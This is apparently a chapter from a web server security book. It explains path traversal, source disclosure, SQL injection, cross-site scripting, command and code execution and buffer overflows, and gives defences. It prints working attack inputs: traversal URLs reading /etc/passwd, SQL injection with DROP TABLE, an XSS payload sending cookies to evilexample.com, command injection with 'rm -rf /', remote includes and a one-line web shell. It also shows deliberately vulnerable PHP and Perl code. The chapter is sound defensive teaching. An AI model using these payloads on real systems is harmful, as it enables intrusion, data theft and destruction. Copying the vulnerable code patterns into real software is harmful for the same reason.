Under ideal circumstances, files will be downloaded directly using the web server. But when a nontrivial authorization scheme is needed, the download takes place through a script after the authorization. Such scripts are web application security hot spots. Failure to validate input in such a script can result in arbitrary file disclosure.
Imagine a set of pages that implement a download center. Download happens through a script called download.php, which accepts the name of the file to be downloaded in a parameter called filename. A careless programmer may form the name of the file by appending the filename to the base directory:

$file_path = $repository_path . "/" . $filename;
An attacker can use the path traversal attack to request any file on the web server:
http://www.example.com/download.php?filename=../../etc/passwd
You can see how I have applied the same principle as before, when I showed attacking the web server directly. A naïve programmer will not bother with the repository path, and will accept a full file path in the parameter, as in:
http://www.example.com/download.php?filename=/etc/passwd
A file can also be disclosed to an attacker through a vulnerable script that uses a request parameter in an include statement:
include($file_path);
PHP will attempt to run the code (making this flaw more dangerous, as I will discuss later in the section “Code Execution”), but if there is no PHP code in the file it will output the contents of the file to the browser.
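Both problems have the same remedy: treat the filename as untrusted, canonicalize the full path, and verify that it stays inside the repository before serving anything. A Python sketch of the idea (the repository location is an example):

```python
import os.path

REPOSITORY_PATH = "/var/www/downloads"  # example repository location

def resolve_download(filename):
    # Join and canonicalize, collapsing any ".." components
    candidate = os.path.normpath(os.path.join(REPOSITORY_PATH, filename))
    # Serve the file only if the canonical path is still inside the
    # repository; anything else is a traversal attempt
    if candidate.startswith(REPOSITORY_PATH + os.sep):
        return candidate
    return None

print(resolve_download("report.pdf"))        # /var/www/downloads/report.pdf
print(resolve_download("../../etc/passwd"))  # None
```

A production version would also resolve symbolic links (with os.path.realpath or its equivalent) before the comparison, so that a link inside the repository cannot point outside it.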
Source code disclosure usually happens when a web server is tricked into displaying a script instead of executing it. A popular way of doing this is to modify the URL enough to confuse the web server (and prevent it from determining the MIME type of the file) and simultaneously keep the URL similar enough to the original to allow the operating system to find it. This will become clearer after a few examples.
URL-encoding some characters in the request used to cause Tomcat and WebLogic to display the specified script file instead of executing it (see http://www.securityfocus.com/bid/2527). In the following example, the letter p in the extension .jsp is URL-encoded:
http://www.example.com/index.js%70
Appending a URL-encoded null byte to the end of a request used to cause JBoss to reveal the source code (see http://www.securityfocus.com/bid/7764):
http://www.example.com/web-console/ServerInfo.jsp%00
Apache will respond with a 404 (Not Found) response to any request that contains a URL-encoded null byte in the filename.
Many web servers used to get confused by the mere use of uppercase letters in the file extension (an attack effective only on platforms with case-insensitive filesystems):
http://www.example.com/index.JSP
Another way to get to the source code is to exploit a badly written script that is supposed to allow selective access to source code. At one point, Internet Information Server shipped with such a script enabled by default (see http://www.securityfocus.com/bid/167). The script was supposed to show the source code of the example programs only, but because programmers did not bother to check which files were being requested, anyone was able to use the script to read any file on the system. Requesting the following URL, for example, returned the contents of the boot.ini file from the root of the C: drive:

http://www.sitename.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
Most of the vulnerabilities are old because I chose to reference the popular servers to make the examples more interesting. You will find that new web servers almost always suffer from these same problems.
So you have turned directory listings off, and you feel better now? Guessing filenames is sometimes easy:
If you need to perform a quick test on the web server, chances are you will name the file according to the test you wish to make. Names like upload.php, test.php, and phpinfo.php are common (the extensions are given for PHP, but the same logic applies to other environments).
Old files may be left on the server with names such as index2.html, index.old.html, or index.html.old.
Web authoring applications often generate files that find their way to the server. (Of course, some are meant to be on the server.) A good example is a popular FTP client, WS_FTP. It places a log file into each folder it transfers to the web server. Since people often transfer folders in bulk, the log files themselves are transferred, exposing file paths and allowing the attacker to enumerate all files. Another example is CityDesk, which places a list of all files in the root folder of the site in a file named citydesk.xml. Macromedia’s Dreamweaver and Contribute have many publicly available files.
Configuration management tools create many files with metadata. Again, these files are frequently transferred to the web site. CVS, the most popular configuration management tool, keeps its files in a special folder named CVS. This folder is created as a subfolder of every user-created folder, and it contains the files Entries, Repository, and Root.
Text editors often create backup files. When changes are performed directly on the server, backup files remain there. Even when created on a development server or workstation, by virtue of bulk folder FTP transfer, they end up on the production server. Backup files have extensions such as ~, .bak, .old, .bkp, and .swp.
Script-based applications often consist of files not meant to be accessed directly from the web server but instead used as libraries or subroutines. Exposure happens if these files have extensions that are not recognized by the web server as a script. Instead of executing the script, the server sends the full source code in response. With access to the source code, the attacker can look for security-related bugs. Also, these files can sometimes be manipulated to circumvent application logic.
Sometimes user home directories are made available under the web server. As a consequence, command-line history can often be freely downloaded. To see some examples, type inurl:.bash_history into Google. (The use of search engines to perform reconnaissance is discussed in Chapter 11.)
Most downloads of files that should not be downloaded happen because web servers do not obey one of the fundamental principles of information security: they do not fail securely. If a file extension is not recognized, the server assumes it is a plain text file and sends it anyway. This is fundamentally wrong.
You can do two things to correct this. First, configure Apache to only serve requests that are expected in an application. One way to do this is to use mod_rewrite and file extensions:

# Reject requests with extensions we don't approve
RewriteCond %{SCRIPT_FILENAME} "!(\.html|\.php|\.gif|\.png|\.jpg)$"
RewriteRule .* - [forbidden]
Now even if someone uploads a spreadsheet document to the web server, no one will be able to see it because the mod_rewrite rules will block access. However, this approach will not protect files that have allowed extensions but should not be served. Using mod_rewrite, we can create a list of requests we are willing to accept and serve only those. Create a plain text file with the allowed requests listed:

# This file contains a list of requests we accept. Because
# of the way mod_rewrite works each line must contain two
# tokens, but the second token can be anything.
#
/ -
/index.php -
/news.php -
/contact.php -
Add the following fragment to the Apache configuration. (It is assumed the file you created was placed in /usr/local/apache/conf/allowed_urls.map.)

# Associate a name with a map stored in a file on disk
RewriteMap allowed_urls txt:/usr/local/apache/conf/allowed_urls.map

# Try to determine if the value of variable "$0" (populated with the
# request URI in this case) appears in the rewrite map we defined
# in the previous step. If there is a match the value of the
# "${allowed_urls:$0|notfound}" variable will be replaced with the
# second token in the map (always "-" in our case). In all other cases
# the variable will be replaced by the default value, the string that
# follows the pipe character in the variable - "notfound".
RewriteCond ${allowed_urls:$0|notfound} ^notfound$

# Reject the incoming request when the previous rewrite
# condition evaluates to true.
RewriteRule .* - [forbidden]
Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered so far were mostly harmless, you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.
Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.
Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:
SQL injection, when an injection flaw causes user input to modify an SQL query in a way that was not intended by the application author

Cross-site scripting, when an attacker gains control of a user's browser by injecting HTML and JavaScript code into the page

Command execution, when an attacker executes shell commands on the server
Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in Section 10.9.
SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.
SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so you do not have to type it in.
Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.
CREATE DATABASE sql_injection_test;
USE sql_injection_test;

CREATE TABLE customers (
    customerid INTEGER NOT NULL,
    username CHAR(32) NOT NULL,
    password CHAR(32) NOT NULL,
    PRIMARY KEY(customerid)
);

INSERT INTO customers ( customerid, username, password )
    VALUES ( 1, 'ivanr', 'secret' );
INSERT INTO customers ( customerid, username, password )
    VALUES ( 2, 'jelena', 'alsosecret' );

CREATE TABLE accounts (
    accountid INTEGER NOT NULL,
    customerid INTEGER NOT NULL,
    balance DECIMAL(9, 2) NOT NULL,
    PRIMARY KEY(accountid)
);

INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 1, 1, 1000.00 );
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 2, 2, 2500.00 );
Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database:
<?
$dbhost = "localhost";
$dbname = "sql_injection_test";
$dbuser = "root";
$dbpass = "";

// connect to the database engine
if (!mysql_connect($dbhost, $dbuser, $dbpass)) {
    die("Could not connect: " . mysql_error());
}

// select the database
if (!mysql_select_db($dbname)) {
    die("Failed to select database $dbname: " . mysql_error());
}

// construct and execute query
$query = "SELECT username FROM customers WHERE customerid = "
    . $_REQUEST["customerid"];

$result = mysql_query($query);
if (!$result) {
    die("Failed to execute query [$query]: " . mysql_error());
}

// show the result
while ($row = mysql_fetch_assoc($result)) {
    echo "USERNAME = " . $row["username"] . "<br>";
}

// close the connection
mysql_close();
?>
This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL:
http://www.example.com/view_customer.php?customerid=1
The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example:
http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2
If you specify the URL above, you will get two usernames displayed on the screen instead of the single one the programmer intended the program to supply. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work. After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (with the user-supplied data emphasized for clarity):
SELECT username FROM customers WHERE customerid = 1 OR customerid=2
This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Integers can go into an SQL query directly because they cannot cause a query to fail. This is because integers consist only of numbers, and numbers do not have a special meaning in SQL. Strings, unlike integers, can contain special characters (such as single quotation marks), so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this:
$query = "SELECT customerid FROM customers WHERE username = '"
    . $_REQUEST["username"] . "'";
You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:
http://www.example.com/view_customer.php?username=ivanr
The query becomes:
SELECT customerid FROM customers WHERE username = 'ivanr'
Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:
http://www.example.com/view_customer.php?username=ivanr'%20OR%20username%3D'jelena'--%20
By adding a single quote to the username parameter, we terminated the string and entered the query space. However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes:
SELECT customerid FROM customers WHERE username = 'ivanr' OR username='jelena'-- '
The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used, because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (') that appears in the input to \', in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes, because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application.
Though the examples so far included only the SELECT construct, INSERT and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place.
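To make the prepared-statement idea concrete, here is an illustrative sketch in Python using the built-in sqlite3 module as a stand-in for the PHP/MySQL pair used in this chapter; the placeholder keeps the earlier customerid attack from ever reaching the query:

```python
import sqlite3

# Tiny stand-in database mirroring the customers table from the example
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (customerid INTEGER, username TEXT)")
conn.executemany("INSERT INTO customers VALUES (?, ?)",
                 [(1, "ivanr"), (2, "jelena")])

def get_username(customerid):
    # The "?" placeholder sends the query template and the user data
    # to the database separately; the data is never parsed as SQL.
    cur = conn.execute(
        "SELECT username FROM customers WHERE customerid = ?",
        (customerid,))
    return [row[0] for row in cur]

print(get_username("1"))                  # ['ivanr']
# The earlier injection attempt is now just a harmless literal:
print(get_username("1 OR customerid=2"))  # []
```

PHP offers the same separation through its database abstraction layers that support prepared statements; the principle is identical regardless of language.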
We have seen how SQL injection can be used to access data from a single table. If the database system supports the UNION construct (which MySQL does as of Version 4), the same concept can be used to fetch data from multiple tables. With UNION, you can append a new query to fetch data and add it to the result set. Suppose the parameter customerid from the previous example is set as follows:
http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL%20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2

The query becomes:
SELECT username FROM customers WHERE customerid = 1 UNION ALL SELECT balance FROM accounts WHERE customerid=2
The original query fetches a username from the customers table. With UNION appended, the modified query fetches the username, but it also retrieves an account balance from the accounts table.
Things become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:
We had to append our query fragment to an existing query, which limited what we could do with the query.
We were limited to the type of the query used by the programmer. A SELECT query could not turn into DELETE or DROP TABLE.
With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database).
When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database:
http://www.example.com/view_customer.php?customerid=1;DROP%20TABLE%20customers
After SQL injection takes place, the second SQL query to be executed will be DROP TABLE customers.
Exploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it.
Databases have special features that make life difficult for those who need to protect them:
You can usually enumerate the tables in the database and the fields in a table. You can retrieve values of various database parameters, some of which may contain valuable information. The exact syntax depends on the database in place.
Microsoft SQL Server ships with over 1,000 built-in stored procedures. Some do fancy stuff such as executing operating system code, writing query output into a file, or performing full database backup over the Internet (to the place of the attacker’s choice, of course). Stored procedures are the first feature attackers will go for if they discover an SQL injection vulnerability in a Microsoft SQL Server installation.
Many databases can read and write files, usually to perform data import and export. These features can be exploited to output the contents of the database to a place where it can be accessed by an attacker. (This MySQL feature was instrumental in compromising the Apache Foundation’s own web site, as described at http://www.dataloss.net/papers/how.defaced.apache.org.txt.)
We have only exposed the tip of the iceberg with our description of SQL injection flaws. Being the most popular type of flaw, SQL injection has been heavily researched. You will find the following papers useful to learn more about such flaws.
“SQL Injection” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf)

“Advanced SQL Injection in SQL Server Applications” by Chris Anley (NGS) (http://www.nextgenss.com/papers/advanced_sql_injection.pdf)

“(more) Advanced SQL Injection” by Chris Anley (NGS) (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf)

“Hackproofing MySQL” by Chris Anley (NGS) (http://www.nextgenss.com/papers/HackproofingMySQL.pdf)

“Blind SQL Injection” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf)

“LDAP Injection” by Sacha Faust (SPI Dynamics) (http://www.spidynamics.com/whitepapers/LDAPinjection.pdf)

“Blind XPath Injection” by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/WhitePaper_Blind_XPath_Injection.pdf)
Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.
This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser.
Suppose a script contains an insecure PHP code fragment such as the following:
<? echo $_REQUEST["param"] ?>
It can be attacked with a URL similar to this one:
http://www.example.com/xss.php?param=<script>alert(document.location)</script>
The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable), though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks.
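The corresponding defense is to escape data on output. A small Python sketch (html.escape plays the role that htmlspecialchars would play in the PHP examples) shows the proof-of-concept payload being neutralized:

```python
import html

def render_param(param):
    # Escape on output: <, >, & and quotes become HTML entities, so
    # the browser displays the payload instead of executing it.
    return "<p>You said: " + html.escape(param) + "</p>"

payload = "<script>alert(document.location)</script>"
print(render_param(payload))
# <p>You said: &lt;script&gt;alert(document.location)&lt;/script&gt;</p>
```

The rule of thumb is to escape at the last moment, at the point where untrusted data is written into the page, because only there do you know the output context.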
Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker’s registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time.
XSS attacks can have some of the following consequences:
If attackers can control the HTML markup, they can make the page look any way they want. Since URLs are limited in size, they cannot be used directly to inject a lot of content. But there is enough space to inject a frame into the page and to point the frame to a server controlled by an attacker. A large injected frame can cover the content that would normally appear on the page (or push it outside the visible browser area). When a successful deception attack takes place, the user will see a trusted location in the location bar and read the content supplied by the attacker (a handy way of publishing false news on the Internet). This may lead to a successful phishing attack.
If an XSS attack is performed against a web site where users keep confidential information, a piece of JavaScript code can gain access to the displayed pages and forms and can collect the data and send it to a remote (evil) server.
Sometimes a user’s browser can go places the attacker’s browser cannot. This is often the case when the user is accessing a password-protected web site or accessing a web site where access is restricted based on an IP address.
This is an extension from the previous point. Not only can the attacker access privileged information, but he can also perform requests without the user knowing. This can prove to be difficult in the case of an internal and well-guarded application, but a determined attacker can pull it off. This type of attack is a variation on XSS and is sometimes referred to as cross-site request forgery (CSRF). It’s a dangerous type of attack because, unlike XSS where the attacker must interact with the original application directly, CSRF attacks are carried out from the user’s IP address and the attacker becomes untraceable.
Though most attention is given to XSS attacks that contain JavaScript code, XSS can be used to invoke other dangerous elements, such as Flash or Java programs or even ActiveX objects. Successful activation of an ActiveX object, for example, would allow the attacker to take full control over the workstation.
If the browser is not maintained and regularly patched, it may be possible for malicious code to compromise it. An unpatched browser is a flaw of its own; the XSS attack only helps to achieve the compromise.
The most dangerous consequence of an XSS attack is having a session token stolen. (Session management mechanics were discussed earlier in this chapter.) A person with a stolen session token has as much power as the user the token belongs to. Imagine an e-commerce system that works with two classes of users: buyers and administrators. Anyone can be a buyer (the more the better) but only company employees can work as administrators. A cunning criminal may register with the site as a buyer and smuggle a fragment of JavaScript code in the registration details (in the name field, for example). Sooner or later (the attacker may place a small order to speed things up, especially if it is a smaller shop) one of the administrators will access her registration details, and the session token will be transmitted to the attacker. Notified about the token, the attacker will effortlessly log into the application as the administrator. If written well, the malicious code will be difficult to detect. It will probably be reused many times as the attacker explores the administration module.
In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code:
<script>document.write('<img src=http://www.evilexample.com/' + document.cookie + '>')</script>
If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:
<script src=http://www.evilexample.com/script.js></script>
Though these examples show how a session token is stolen when it is stored in a cookie, nothing in cookies makes them inherently insecure. All session token transport mechanisms are equally vulnerable to session hijacking via XSS.
XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies.
One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, only Internet Explorer supports this feature.
XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.
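As an illustration of the output-escaping principle, here is a minimal sketch in Python using the standard html module (the language choice and the render_comment function are illustrative; the book's own examples use PHP):

```python
import html

def render_comment(username: str) -> str:
    # Escape &, <, >, " and ' so user-supplied markup is displayed
    # as text instead of being interpreted by the browser.
    safe = html.escape(username, quote=True)
    return "<p>Comment by: %s</p>" % safe

# A registration name carrying an XSS payload is rendered harmless:
payload = '<script>alert(document.cookie)</script>'
print(render_comment(payload))
```

The dangerous characters arrive in the page as &lt;, &gt;, and so on, so the script element is never parsed as markup.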
“The Cross Site Scripting FAQ” by Robert Auger (http://www.cgisecurity.com/articles/xss-faq.txt)
“Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests” by CERT Coordination Center (http://www.cert.org/advisories/CA-2000-02.html)
“Understanding Malicious Content Mitigation for Web Developers” by CERT Coordination Center (http://www.cert.org/tech_tips/malicious_code_mitigation.html)
“Cross-Site Scripting” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf)
“Cross-Site Tracing (XST)” by Jeremiah Grossman (WhiteHat Security) (http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf)
“Second-order Code Injection Attacks” by Gunter Ollmann (NGS) (http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf)
“Divide and Conquer: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics” by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf)
Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.
Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:
$output = `ls -al /home/$username`;
echo $output;
This code is meant to display a list of files in a user’s folder. If a semicolon is used in the input, it will mark the end of the first command and the beginning of a second, which can be anything the attacker wants. The invocation:
http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd
will display the contents of the passwd file on the server.
Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:
Execute any binary on the server (use your imagination)
Start a Telnet server and log into the server with privileges of the web server user
Download other binaries from public servers
Download and compile tool source code
Perform exploits to gain root access
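The underlying fix is to keep user input off the shell command line entirely. Here is a sketch in Python (illustrative; the vulnerable examples in this section are PHP and Perl) that combines input whitelisting with shell-free process execution:

```python
import subprocess

def list_home(username: str) -> str:
    # Refuse anything that is not a plain account name; a whitelist
    # is safer than trying to strip individual shell metacharacters.
    if not username.isalnum():
        raise ValueError("invalid username")
    # Passing an argument list (and no shell) means the value is never
    # parsed by /bin/sh, so ';', '|' and friends carry no meaning.
    result = subprocess.run(["ls", "-al", "/home/" + username],
                            capture_output=True, text=True)
    return result.stdout
```

With this structure, the attack URL from above would be rejected before any process is started.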
The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this:
# send email to the user
open(MAIL, "|/usr/lib/sendmail $email");
print MAIL "Thank you for contacting us.\n";
close MAIL;
This code never checks whether the parameter $email contains only an email address. Since the value of the parameter is used directly on the command line, an attacker could terminate the email address with a semicolon and execute any other command on the system:
http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/
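The standard fix is to validate the email parameter before it ever reaches the command line. A sketch in Python (the pattern below is deliberately conservative and is my illustration, not a complete address validator):

```python
import re

# Letters, digits, and a few safe punctuation characters only --
# no semicolons, spaces, quotes, or pipes can get through.
EMAIL_RE = re.compile(r'[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')

def safe_email(value: str) -> str:
    # fullmatch() requires the whole string to be an address,
    # so trailing command fragments cause rejection.
    if not EMAIL_RE.fullmatch(value):
        raise ValueError("invalid email address")
    return value
```

Given this check, the malicious value ending in ;rm%20-rf%20/ never makes it into the sendmail invocation.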
Code execution is a variation of command execution. It refers to execution of code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include() statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include() statement is usually similar to this:
include($_REQUEST["module"] . "/index.php");
Here is an example URL with which it can be used:
http://www.example.com/index.php?module=news
In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script.
As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename. When used in combination with include(), PHP will download and execute a script from a remote server (!):
http://www.example.com/index.php?module=http://www.evilexample.com
Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path:
include($TEMPLATES . "/template.php");
With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same:
http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com
It’s even worse if the PHP code only uses a request parameter to locate the file, like in the following example:
include($parameter);
When the register_globals option is enabled and a request is of the multipart/form-data type (the type of the request is determined by the attacker, so he can choose the one that suits him best), PHP will store an uploaded file somewhere on disk and put the full path to the temporary file into the variable $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks!
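A common defense against all of these include() manipulations is to never build a filesystem path from request input at all. A minimal sketch in Python (the module names and paths are hypothetical; the vulnerable examples above are PHP):

```python
# Request input selects from a fixed table and never becomes
# part of a filesystem path, so neither remote URLs nor uploaded
# temporary files can be reached through it.
ALLOWED_MODULES = {
    "news": "/var/www/app/news/index.php",
    "search": "/var/www/app/search/index.php",
}

def resolve_module(param: str) -> str:
    try:
        return ALLOWED_MODULES[param]
    except KeyError:
        raise ValueError("unknown module: %r" % param)
```

With this approach, ?module=http://www.evilexample.com fails the lookup instead of being fed to an include statement.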
Other problems can also lead to code execution on the server, as when someone manages to upload a PHP script through the FTP server and gets it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the “SQL Injection” section for an example.)
A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image he will be able to execute anything on the server. He will often only upload a one-line script similar to this one:
<? passthru($cmd) ?>
Try it out for yourself and see how easy it can be.
Injection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur anywhere characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, the special characters are &, <, >, “, and ’. Problems only arise if the programmer does not take steps to handle metacharacters properly.
To prevent injection attacks, a programmer needs to perform four steps:
Identify system components
Identify metacharacters for each component
Validate data on input of every component (e.g., to ensure a variable contains an email address, if it should)
Transform data on input of every component to neutralize metacharacters (e.g., an ampersand character (&) that appears in user data and needs to be part of an HTML page must be converted to &amp;)
Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.
The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.
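Here is what control/data separation looks like in practice, sketched with Python's built-in sqlite3 module (an illustrative example, not tied to any application in this chapter):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('ivanr', 'ivanr@webkreator.com')")

def find_user(username: str):
    # The ? placeholder sends the value to the database separately
    # from the SQL text, so quotes in the input can never change
    # the structure of the query.
    cur = conn.execute("SELECT email FROM users WHERE username = ?",
                       (username,))
    return cur.fetchall()

# An injection attempt is treated as a literal (nonexistent) username:
print(find_user("' OR '1'='1"))
print(find_user("ivanr"))
```

Because the single quotes travel as data, the classic ' OR '1'='1 payload simply matches no rows.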
A buffer overflow occurs when an attempt is made to store a larger piece of data in a limited-length buffer. Because of the lack of boundary checking, some amount of data will be written to memory locations immediately following the buffer. When an attacker manipulates program input, supplying a specially crafted payload, a buffer overflow can be used to gain control of the application.
Buffer overflows affect C-based languages. Since most web applications are scripted (or written in Java, which is not vulnerable to buffer overflows), they are seldom affected by buffer overflows. Still, a typical web deployment can contain many components written in C:
Web servers, such as Apache
Custom Apache modules
Application engines, such as PHP
Custom PHP modules
CGI scripts written in C
External systems
Note that external systems such as databases, mail servers, and directory servers are often programmed in C, too. That the application itself is scripted is irrelevant: if data crosses system boundaries to reach an external system, an attacker could exploit a vulnerability there.
A detailed explanation of how buffer overflows work falls outside the scope of this book. Consult the following resources to learn more:
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes by Jack Koziol et al. (Wiley)
“Practical Code Auditing” by Lurene A. Grenier (http://www.daemonkitty.net/lurene/papers/Audit.pdf)
“Buffer Overflows Demystified” by Murat Balaban (http://www.enderunix.org/docs/eng/bof-eng.txt)
“Smashing The Stack For Fun And Profit” by Aleph One (http://www.insecure.org/stf/smashstack.txt)
“Advanced Doug Lea’s malloc exploits” by jp@corest.com (http://www.phrack.org/phrack/61/p61-0x06_Advanced_malloc_exploits.txt)
“Taking advantage of nonterminated adjacent memory spaces” by twitch@vicar.org (http://www.phrack.org/phrack/56/p56-0x0e)
